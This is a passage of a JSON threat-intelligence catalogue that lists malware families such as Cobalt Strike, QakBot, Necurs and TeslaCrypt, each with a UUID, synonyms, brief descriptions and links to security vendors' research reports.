"http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf"
]
}
},
{
"uuid": "fa278536-8293-4717-86b5-8a03aa11063f",
"value": "Buhtrap",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/"
]
}
},
{
"uuid": "66862f1a-5823-4a9a-bd80-439aaafc1d8b",
"value": "MacRansom",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x1E.html",
"https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service"
]
}
},
{
"uuid": "0ec7d065-3418-43ba-a0cc-1e06471893ad",
"value": "Nagini",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/"
]
}
},
{
"uuid": "25a280b2-0260-4593-bf8c-7062dfdc6c38",
"value": "OpGhoul",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/"
]
}
},
{
"uuid": "243ae1f7-183e-4ea9-82cf-3353a0ef78f4",
"value": "Medre",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/06/medrea-autocad-worm-samples.html"
]
}
},
{
"uuid": "515ee69a-298a-4fcf-bdb0-c5fc6d41872f",
"value": "Shylock",
"description": "",
"meta": {
"synonyms": [
"Caphaw"
],
"type": [],
"refs": [
"https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/",
"http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html",
"https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/",
"https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/",
"https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware",
"https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw"
]
}
},
{
"uuid": "af35e295-7087-4f6c-9f70-a431bf223822",
"value": "ShellLocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/813726714228604928"
]
}
},
{
"uuid": "15daa766-f721-4fd5-95fb-153f5361fb87",
"value": "Leverage",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis",
"https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/"
]
}
},
{
"uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb",
"value": "Necurs",
"description": "",
"meta": {
"synonyms": [
"nucurs"
],
"type": [],
"refs": [
"https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs",
"https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features",
"http://blog.talosintelligence.com/2017/03/necurs-diversifies.html",
"https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf",
"https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors",
"https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/"
]
}
},
{
"uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d",
"value": "Philadephia Ransom",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/",
"https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html",
"https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware",
"https://blogs.forcepoint.com/security-labs/shelf-ransomware-used-target-healthcare-sector",
"https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/"
]
}
},
{
"uuid": "dc39dcdf-50e7-4d55-94a0-926853f344f3",
"value": "Evilbunny",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cyphort.com/evilbunny-malware-instrumented-lua/",
"https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope"
]
}
},
{
"uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550",
"value": "Cobalt Strike",
"description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html",
"https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
"https://www.lac.co.jp/lacwatch/people/20180521_001638.html",
"https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/"
]
}
},
{
"uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06",
"value": "win.medusa",
"description": "Medusa is a DDoS bot written in .NET 2.0. In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/",
"https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/",
"https://news.drweb.com/show/?i=10302&lng=en",
"https://webcache.googleusercontent.com/search?q=cache:ZbKznF-dogcJ:https://www.toolbase.me/board/topic/10061-b-medusa-irc-ddos-botnet-bypass-cf-cookie-protections/"
]
}
},
{
"uuid": "fa0ffc56-6d82-469e-b624-22882f194ce9",
"value": "HappyLocker (HiddenTear?)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "978cfb82-5fe9-46d2-9607-9bcdfeaaa58c",
"value": "win.glupteba",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://resources.infosecinstitute.com/tdss4-part-1/",
"http://malwarefor.me/2015-04-13-nuclear-ek-glupteba-and-operation-windigo/",
"https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/",
"https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/",
"https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/"
]
}
},
{
"uuid": "54327cbd-d30c-4684-9a66-18ae36b28399",
"value": "PoohMilk Loader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/",
"http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html"
]
}
},
{
"uuid": "87a45a07-30d7-4223-ae61-6b1e6dde0f5a",
"value": "Romeo(Alfa,Bravo, ...)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "b255fd2c-6ddb-452f-b660-c9f5d3a2ff63",
"value": "xsPlus",
"description": "",
"meta": {
"synonyms": [
"nokian"
],
"type": [],
"refs": [
"https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf",
"https://securelist.com/analysis/publications/69953/the-naikon-apt/",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
]
}
},
{
"uuid": "80487bca-7629-4cb2-bf5b-993d5568b699",
"value": "Bouncer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "150cde2c-ae36-4fa5-8d8d-8dedc3de43de",
"value": "Combojack",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/03/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/"
]
}
},
{
"uuid": "acd8fc63-c22a-4c11-907e-33e358fdd293",
"value": "StarCruft",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/operation-daybreak/75100/"
]
}
},
{
"uuid": "b88b50c0-3db9-4b8f-8564-4f56f991bee2",
"value": "Ruckguv",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear"
]
}
},
{
"uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6",
"value": "DuQu",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf"
]
}
},
{
"uuid": "bc0c1e48-102c-4e6b-9b86-c442c4798159",
"value": "CryptoWire",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/"
]
}
},
{
"uuid": "95b454f6-8ffb-4ef7-8a91-14d48601a899",
"value": "BfBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "098cfb93-8921-48f0-a694-a83f350e8a61",
"value": "Chinad",
"description": "Adware that shows advertisements using plugin techniques for popular browsers",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "96a695de-2560-4f10-bbd6-3bc2ac27b7f7",
"value": "AvastDisabler",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/"
]
}
},
{
"uuid": "929112e4-e252-4273-b3c2-fd414cfb2776",
"value": "Lurk",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader"
]
}
},
{
"uuid": "4df1b257-c242-46b0-b120-591430066b6f",
"value": "POSHSPY",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html",
"https://github.com/matthewdunwoody/POSHSPY"
]
}
},
{
"uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a",
"value": "IsSpace",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/"
]
}
},
{
"uuid": "2ccaccd0-8362-4224-8497-2012e7cc7549",
"value": "QakBot",
"description": "",
"meta": {
"synonyms": [
"Pinkslipbot",
"Qbot"
],
"type": [],
"refs": [
"https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/",
"https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/",
"http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf",
"http://contagiodump.blogspot.com/2010/11/template.html",
"https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf",
"https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html",
"https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf"
]
}
},
{
"uuid": "b602edb3-81c2-4772-b5f8-73deb85cb40a",
"value": "Silon",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm",
"http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html"
]
}
},
{
"uuid": "808445e6-f51c-4b5d-a812-78102bf60d24",
"value": "Tater PrivEsc",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/Kevin-Robertson/Tater"
]
}
},
{
"uuid": "8804e02c-a139-4c3d-8901-03302ca1faa0",
"value": "JadeRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.lookout.com/mobile-threat-jaderat"
]
}
},
{
"uuid": "7d480f11-3de8-463d-8a19-54685c8b9e0f",
"value": "Stealth Mango",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.lookout.com/info/stealth-mango-report-ty"
]
}
},
{
"uuid": "acdda3e5-e776-419b-b060-14f3406de061",
"value": "WebC2-DIV",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "bd79d5be-5c2f-45c1-ac99-0e755a61abad",
"value": "TeslaCrypt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blogs.cisco.com/security/talos/teslacrypt",
"https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/",
"https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/",
"https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/",
"https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf",
"https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/",
"https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack"
]
}
},
{
"uuid": "47b67fa4-f32e-4b6b-a32d-42c5ca0b8e9a",
"value": "Wirenet",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html",
"https://news.drweb.com/show/?i=2679&lng=en&c=14"
]
}
},
{
"uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405",
"value": "Mughthesec",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x20.html"
]
}
},
{
"uuid": "5e362cd1-bc5c-4225-b820-00ec7ebebadd",
"value": "Uiwix",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.minerva-labs.com/post/uiwix-evasive-ransomware-exploiting-eternalblue"
]
}
},
{
"uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2",
"value": "Goggles",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "bdb27944-1f79-46f7-a0d7-c344429790c2",
"value": "Maktub",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/",
"https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html",
"https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/"
]
}
},
{
"uuid": "39002a0d-99aa-4568-b110-48f6df1759cd",
"value": "Skyplex",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846",
"value": "Slingshot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/apt-slingshot/84312/",
"https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf",
"https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/"
]
}
},
{
"uuid": "65b7eff4-741c-445e-b4e0-8a4e4f673a65",
"value": "OceanLotus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update",
"https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
"https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/"
]
}
},
{
"uuid": "383021b9-fcf9-4c21-a0e2-d75fb8c0727a",
"value": "Rincux",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c",
"value": "BetaBot",
"description": "",
"meta": {
"synonyms": [
"Neurevt"
],
"type": [],
"refs": [
"https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39",
"https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html",
"http://www.xylibox.com/2015/04/betabot-retrospective.html",
"http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref",
"https://www.arbornetworks.com/blog/asert/beta-bot-a-code-review/",
"https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en",
"http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html"
]
}
},
{
"uuid": "947dffa1-0184-48d4-998e-1899ad97e93e",
"value": "Babar",
"description": "",
"meta": {
"synonyms": [
"SNOWBALL"
],
"type": [],
"refs": [
"http://www.spiegel.de/media/media-35683.pdf",
"https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/",
"https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/",
"https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope",
"https://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/"
]
}
},
{
"uuid": "27d90cd6-095a-4c28-a6f2-d1b47eae4f70",
"value": "Alina POS",
"description": "",
"meta": {
"synonyms": [
"alina_spark",
"katrina",
"alina_eagle"
],
"type": [],
"refs": [
"http://www.xylibox.com/2013/02/alina-34-pos-malware.html",
"https://www.nuix.com/blog/alina-continues-spread-its-wings",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/"
]
}
},
{
"uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840",
"value": "Vobfus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html",
"https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/"
]
}
},
{
"uuid": "cd201689-4bf1-4c5b-ac4d-21c4dcc39e7d",
"value": "Pony",
"description": "",
"meta": {
"synonyms": [
"Fareit"
],
"type": [],
"refs": [
"https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf",
"https://github.com/nyx0/Pony"
]
}
},
{
"uuid": "137cde28-5c53-489b-ad0b-d0fa2e342324",
"value": "Banjori",
"description": "",
"meta": {
"synonyms": [
"MultiBanker 2",
"BankPatch",
"BackPatcher"
],
"type": [],
"refs": [
"http://blog.kleissner.org/?p=69",
"http://blog.kleissner.org/?p=192",
"https://www.johannesbader.ch/2015/02/the-dga-of-banjori/"
]
}
},
{
"uuid": "b71f1656-975a-4daa-8109-00c30fd20410",
"value": "TeleDoor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintelligence.com/2017/07/the-medoc-connection.html",
"https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/"
]
}
},
{
"uuid": "2713a763-33fa-45ce-8552-7dd12b6b8ecc",
"value": "Hacksfase",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9",
"value": "HackSpy",
"description": "Py2Exe based tool as found on github.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/ratty3697/HackSpy-Trojan-Exploit"
]
}
},
{
"uuid": "1dfd3ba6-7f82-407f-958d-c4a2ac055123",
"value": "Bart",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "9ad28356-184c-4f02-89f5-1b70981598c3",
"value": "Fireball",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/"
]
}
},
{
"uuid": "f1decba9-6b3b-4636-a2b6-2208e178591a",
"value": "StarLoader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments"
]
}
},
{
"uuid": "42760c2c-bf00-4ace-871c-6dcbbd90b2de",
"value": "MadMax",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/mad-max-dga/"
]
}
},
{
"uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa",
"value": "scanbox",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks",
"http://resources.infosecinstitute.com/scanbox-framework/"
]
}
},
{
"uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf",
"value": "X-Agent",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/",
"https://twitter.com/PhysicalDrive0/status/845009226388918273",
"https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf"
]
}
},
{
"uuid": "6f6da371-2d62-4245-9aa3-8570e39222ae",
"value": "Mirage",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/"
]
}
},
{
"uuid": "1bf03bbb-d3a2-4713-923b-218186c86914",
"value": "FastPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/",
"http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf",
"http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf"
]
}
},
{
"uuid": "4f5c2f8b-06ef-4fb3-b03c-afdcafa88de5",
"value": "ArdaMax",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "4c74c8e1-869e-46a5-b050-e5a551484adc",
"value": "Razy",
"description": "",
"meta": {
"synonyms": [
"xcmkds"
],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/816915354698076161"
]
}
},
{
"uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6",
"value": "Catelites",
"description": "Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang",
"https://www.youtube.com/watch?v=1LOy0ZyjEOk"
]
}
},
{
"uuid": "d53e96c5-abfa-4be4-bb33-0a898c5aff58",
"value": "Unidentified 038",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "e089e945-a523-4d11-a135-396f9b6c1dc7",
"value": "ShadowPad",
"description": "",
"meta": {
"synonyms": [
"XShellGhost"
],
"type": [],
"refs": [
"https://securelist.com/shadowpad-in-corporate-networks/81432/",
"https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf",
"http://www.dailysecu.com/?mod=bbs&act=download&bbs_id=bbs_10&upload_idxno=4070"
]
}
},
{
"uuid": "b662c253-5c87-4ae6-a30e-541db0845f67",
"value": "Vawtrak",
"description": "",
"meta": {
"synonyms": [
"NeverQuest"
],
"type": [],
"refs": [
"http://thehackernews.com/2017/01/neverquest-fbi-hacker.html",
"https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak",
"https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf"
]
}
},
{
"uuid": "4b2ab902-811e-4b50-8510-43454d77d027",
"value": "Crisis",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?",
"http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html",
"https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines"
]
}
},
{
"uuid": "f28fa5ca-9466-410c-aa32-4bd102f3f0e1",
"value": "BadNews",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1",
"https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf",
"https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/",
"https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
"http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2"
]
}
},
{
"uuid": "799921d7-48e8-47a6-989e-487b527af37a",
"value": "Unidentified 032",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/"
]
}
},
{
"uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3",
"value": "BONDUPDATER",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2"
]
}
},
{
"uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419",
"value": "POWRUNER",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2"
]
}
},
{
"uuid": "7c6ed154-3232-4b7a-80c3-8052ce0c7333",
"value": "Netrepser",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://labs.bitdefender.com/2017/05/inside-netrepser-a-javascript-based-targeted-attack/"
]
}
},
{
"uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13",
"value": "DogHousePower",
"description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github.",
"meta": {
"synonyms": [
"Shelma"
],
"type": [],
"refs": [
"http://www1.paladion.net/hubfs/Newsletter/DogHousePower-%20Newly%20Identified%20Python-Based%20Ransomware.pdf"
]
}
},
{
"uuid": "b39ffc73-db5f-4a8a-acd2-bee958d69155",
"value": "Pushdo",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf",
"http://malware-traffic-analysis.net/2017/04/03/index2.html",
"https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/"
]
}
},
{
"uuid": "8611f656-b0d8-4d16-93f0-c699f2af9b7a",
"value": "Royal DNS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/nccgroup/Royal_APT",
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
]
}
},
{
"uuid": "6bd20349-1231-4aaa-ba2a-f4b09d3b344c",
"value": "Seduploader",
"description": "",
"meta": {
"synonyms": [
"jhuhugit",
"jkeyskw",
"carberplike",
"downrage"
],
"type": [],
"refs": [
"https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/",
"https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html",
"https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/",
"http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf",
"http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html",
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/",
"http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/",
